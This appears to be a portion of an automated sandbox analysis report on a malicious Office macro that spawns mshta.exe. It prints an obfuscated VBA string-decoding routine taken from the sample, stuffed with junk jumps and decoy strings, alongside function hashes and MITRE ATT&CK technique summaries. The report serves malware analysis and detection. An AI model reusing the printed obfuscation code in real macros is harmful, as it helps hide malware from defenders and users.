1094	vuVDUGKlLQQjgCYxplwN = "ylSNrtZ"
1095	Goto zzyCahoSffuyB
1095	SekgrIJfgqNu:
1097	End Function

Function QUj8uaqq5, APIs: 4, Strings: 15, Number of lines: 49, Relevance: 36.799

APIs	Meta Information
Len	Len(":3") -> 2 Len("3") -> 1 Len("Fr{f{tKPQLvl") -> 12 Len("2") -> 1 Len("ztN\|j\|gLkM") -> 10 Len("4") -> 1 Len("GwrrtQ\|myw") -> 10 Len("PzJtmxL") -> 7 Len("5") -> 1 Len("Em]UnMtwYp") -> 10 Len(".P") -> 2 Len("8") -> 1 Len("TW}muJ^V\x201a[v\x201aJQ") -> 14 Len("9") -> 1 Len("n_sOYV\xfffd") -> 7
StrReverse	StrReverse(":3") -> 3: StrReverse("3") -> 3 StrReverse("Fr") -> rF StrReverse("{f") -> f{ StrReverse("{t") -> t{ StrReverse("KP") -> PK StrReverse("QL") -> LQ StrReverse("vl") -> lv StrReverse("2") -> 2 StrReverse("zt") -> tz StrReverse("N\|") -> \|N StrReverse("j\|") -> \|j StrReverse("gL") -> Lg StrReverse("kM") -> Mk StrReverse("4") -> 4 StrReverse("Gw") -> wG StrReverse("rr") -> rr StrReverse("tQ") -> Qt StrReverse("\|m") -> m\| StrReverse("yw") -> wy StrReverse("Pz") -> zP StrReverse("Jt") -> tJ StrReverse("mx") -> xm StrReverse("L") -> L StrReverse("5") -> 5 StrReverse("Em") -> mE StrReverse("]U") -> U] StrReverse("nM") -> Mn StrReverse("tw") -> wt StrReverse("Yp") -> pY StrReverse(".P") -> P. StrReverse("8") -> 8
Mid
DoEvents

Strings	Decrypted Strings
"LvFLTlzHIRp"
"aSCknHko"
"hJdIgyKywq"
"oDtw"
"pmIfDvrDTjsBZTxzg"
"pmIfDvrDTjsBZTxzg"
"oDtw"
"LvFLTlzHIRp"
"pmIfDvrDTjsBZTxzg"
"hJdIgyKywq"
"aSCknHko"
"aSCknHko"
"hJdIgyKywq"
"LvFLTlzHIRp"
"oDtw"

Line	Instruction	Meta Information
1098	Public Function QUj8uaqq5(EDbQ3ngSm as String) as String
1099	Dim epFocqLY5 as Variant	executed
1100	For epFocqLY5 = 1 To Len(EDbQ3ngSm) Step 2	Len(":3") -> 2 executed
1101	If 680266810 = 680266810 + 1 Then
1101	End
1101	Endif
1102	Dim tCPqKpOfGfqlDmJsEK as Byte
1103	Goto OFyJTDCppRZlOhNkDP
1103	OFyJTDCppRZlOhNkDP:
1105	Goto FcLQcZkBCYZiGnQgM
1105	eQeIVUlorjHQPz:
1107	wQfREfBAdJbNRrRd = "pmIfDvrDTjsBZTxzg"
1108	Goto kEhmzJfsgRt
1108	kEhmzJfsgRt:
1110	QUj8uaqq5 = QUj8uaqq5 & StrReverse(Mid(EDbQ3ngSm, epFocqLY5, 2))	StrReverse(":3") -> 3: Mid executed
1111	Goto OqYpbfFfqkCAQsQJFQ
1111	lVQFaQHUgONBnOlxL:
1113	NPwCVeTzuvtyjqxN = "oDtw"
1114	Goto KxBbOMGZVsOntp
1114	KxBbOMGZVsOntp:
1116	yhvUUvEQtMsPiHitnF = "LvFLTlzHIRp"
1117	Goto RgBDMQRuKdxQKAgppo
1117	wRFPniLMtNS:
1119	wQfREfBAdJbNRrRd = "pmIfDvrDTjsBZTxzg"
1120	Goto QwFGEJhnuZ
1120	wHBTCZITaVhyNUQgDyce:
1122	NqUSApJArEPyxllM = "hJdIgyKywq"
1123	Goto mukPKLJOzszeEqGKMEe
1123	QwFGEJhnuZ:
1125	FNDjrsqvSahKYQnrul = "aSCknHko"
1126	Goto lBEHzYngQyAU
1126	OqYpbfFfqkCAQsQJFQ:
1128	Goto wRFPniLMtNS
1128	RgBDMQRuKdxQKAgppo:
1130	FNDjrsqvSahKYQnrul = "aSCknHko"
1131	Goto eQeIVUlorjHQPz
1131	FcLQcZkBCYZiGnQgM:
1133	NqUSApJArEPyxllM = "hJdIgyKywq"
1134	Goto lVQFaQHUgONBnOlxL
1134	lBEHzYngQyAU:
1136	yhvUUvEQtMsPiHitnF = "LvFLTlzHIRp"
1137	Goto CPMvIiiJRfGbFev
1137	CPMvIiiJRfGbFev:
1139	NPwCVeTzuvtyjqxN = "oDtw"
1140	Goto wHBTCZITaVhyNUQgDyce
1140	mukPKLJOzszeEqGKMEe:
1142	DoEvents	DoEvents
1143	Next epFocqLY5	Len(":3") -> 2 executed
1144	End Function

Reset < >

Analysis Process: mshta.exe PID: 1228 Parent PID: 2144 mshta.exeCOMMON

Executed Functions

Function 028B11D7, Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

),t=this.a("borderStyle_right",y);""!=(a+b+e+l).replace(/transparent/g,"")&&(u=u.concat(this.ma(c.u+k/2,c.w+d/2,c.A+k/2+h/2,c.v+d/2+f/2,n,r,q,m,d,k,f,h,a,e,b,l,g,x,p,t)));this.c.insertAdjacentHTML("beforeEnd",u.join(""));this.parent?(this.element.backingCanvas, xrefs: 028B12FF

Memory Dump Source

Source File: 00000002.00000003.1648516712.028B1000.00000010.sdmp, Offset: 028B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_28b1000_mshta.jbxd

Similarity

API ID:
String ID: ),t=this.a("borderStyle_right",y);""!=(a+b+e+l).replace(/transparent/g,"")&&(u=u.concat(this.ma(c.u+k/2,c.w+d/2,c.A+k/2+h/2,c.v+d/2+f/2,n,r,q,m,d,k,f,h,a,e,b,l,g,x,p,t)));this.c.insertAdjacentHTML("beforeEnd",u.join(""));this.parent?(this.element.backingCanvas
API String ID: 0-3151922002
Opcode ID: 695c0dd89c4d159aaed4f4e04ca5953ff181360218a11e1f3940d393e28df761
Instruction ID: cfdbd1c574d5137196a510f713545047d4e52a03c78680d7715e673ff3fadb53
Opcode Fuzzy Hash: 695c0dd89c4d159aaed4f4e04ca5953ff181360218a11e1f3940d393e28df761
Instruction Fuzzy Hash: 8FC1AB3CA043089FEB26CF50C4AABAAB7A1BF45718F14855DE55E9B341D3B4E841CB92

Uniqueness

Uniqueness Score: -1,00%

Function 028B1900, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648516712.028B1000.00000010.sdmp, Offset: 028B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_28b1000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a114571479089f28c67336da7a4e2a4fb3aceda48cb459df20283d892a194274
Instruction ID: 0fe0e1b0eaa40d4048667ef83afa04f26e6d9807c9685a84e6416864f582455b
Opcode Fuzzy Hash: a114571479089f28c67336da7a4e2a4fb3aceda48cb459df20283d892a194274
Instruction Fuzzy Hash: 5B213A3D6442849BD6218A968C5AFBBB398DF49B26F50005DF4AEEF7D1C760EC50C3A1

Uniqueness

Uniqueness Score: -1,00%

Function 02850EBF, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850EDF, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850EEF, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850EF7, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850EFF, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850E37, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850E57, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850E5F, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850FAF, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850FDF, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850FE7, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850F07, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850F17, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850F2F, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850F37, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850F3F, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850DA7, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850DB7, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850DC7, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850DCF, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850DD7, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Function 02850DEF, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000003.1648704261.02850000.00000010.sdmp, Offset: 02850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_3_2850000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction ID: a1551bf8a1640eb8e74aa3993ec81b78669848c8430632c6ebbf82ca5769b198
Opcode Fuzzy Hash: 6d4b0293adfe4e8fe82ba6c6dc294198ec426f294c5455a8e141a898ba30421e
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1,00%

Non-executed Functions

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Utilities such as at and schtasks , along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.
Tactics:	Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.
Tactics:	Command and Control, Defense Evasion
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
Tactics:	Defense Evasion
Data Sources:	API monitoring, Anti-virus, File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, Scripting , PowerShell , or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

